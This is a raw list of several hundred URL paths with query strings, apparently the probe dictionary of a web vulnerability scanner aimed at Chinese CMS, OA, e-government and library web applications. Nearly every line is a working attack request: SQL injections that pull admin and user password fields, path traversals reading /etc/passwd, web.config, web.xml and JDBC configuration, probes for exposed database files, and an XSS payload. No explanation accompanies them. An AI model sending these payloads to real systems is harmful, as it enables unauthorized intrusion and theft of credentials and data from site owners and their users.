/lm/front/findpsw.jsp?editpagename=&groupid=&sysid=../../../../../../../../../../etc/passwd%00.jpg
/admin/Admin_Config.asp
/Project_SPInfoList.aspx?CategoryCode=1'%20and%201=char(106)%20--
/zxts_view.aspx?Id=4%20and%201=char(106)%20--&GBType=1
/FileUpload
/oa_server/App_Pages/App_page/user_update.aspx?userid=172
/api.php?c=api&f=phpok&id=_sublist&param[pid]=1%20union%20select%20concat(md5(1122),0x7c,pass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20from%20qinggan_user%23&param[phpok]=1
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/DelAccessID.asp?AccessID=1'%20and%201=char(106)%20--&Datetime=
/KS_Data/KesionCMS6.mdb
/KS_Data/KesionCMS7.mdb
/KS_Data/KesionCMS8.mdb
/KS_Data/KesionCMS9.mdb
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/Asearch.asp
/linklist.asp?TlinkID=26'/**/and/**/1=char(106)--
/zyjs.asp?Txy=18&tzy=11'%20/**/and/**/1=char(106)%20--
/Biogenic.asp?Tbynf=21'%20and%201=char(106)%20--
/specialty.asp?Tbynf=1%20and%201%3Echar(106)%20--
/api.php?op=video_api&pc_hash=1&uid=1&snid=1122%22%20onmouseover=alert(42873)//&do_complete=1
/toall/desktop/dbform.asp?fn=&fntxt=&varid=8%20AND%201122%3DCONVERT%28INT%2C%28CHAR%2899%29%2bCHAR%28102%29%2bCHAR%28114%29%2bCHAR%28101%29%2bCHAR%28101%29%2bCHAR%28114%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28106%29%2bCHAR%28120%29%29%29
/index.php?c=ajax&a=member_login&template=../../ooxx.php
/addcontent/webEditor/upload/files/file_down.jsp?filename=/../../../../WEB-INF/web.xml
/addcontent/webEditor/upload/files/file_down.jsp?filename=/.xx/./.xx/./.xx/./.xx/./WEB-INxx/F/web.xml
/Tools/FileTool/Manage/Notepad.aspx?objfile=C:/windows/win.ini
/Tools/FileTool/Manage/Notepad.aspx?objfile=/etc/passwd
/workflow/flow_details.aspx?action=details&job_id=-12%20and%201=char(106)
/search.aspx
/servlet/fileOpenforms?filename=/index.jsp
/application/gzhd/bgxz/download.jsp?filename=/index.jsp
/livefiles/pages/inner/userlist.aspx?ModuleType=Friends&RelatedUserType=Friends&UserModuleClientID=ctl00_ctl00_TemplateHolder_ContentHolder_ctl06&userName=1122'%20and%201=char(106)%20--
/truexxgk/app/nrglController/loadZwgk?zdjc=reer'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&type=1
/NewsList.asp
/ActivityList.asp
/WidgetsHandler.ashx?widget=reer'%20where%201=1%20AND%20char(106)%3E0--
/common/guestbook.php
/common/help.php
/Comment/Comment.aspx?id=11'%20and%201=char(106)%20--
/wap/index.php?a=newslist
/index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db
/?question/tag/0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/?question/search/tag:0%27%75nion%20select%201,2,3,4,5,6,(%73elect%20concat(0x23,md5(1122),0x23)%20%66rom%20ask_user%20limit%200,1),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23.html
/admin/uploadFile.action
/Adminiscentertrator/AdmIndex.asp
/Adminiscentertrator/AdmLinkInsert.asp
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/NewsList.asp
/bit-xxzs/xmlpzs/bsdetail.asp?id=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
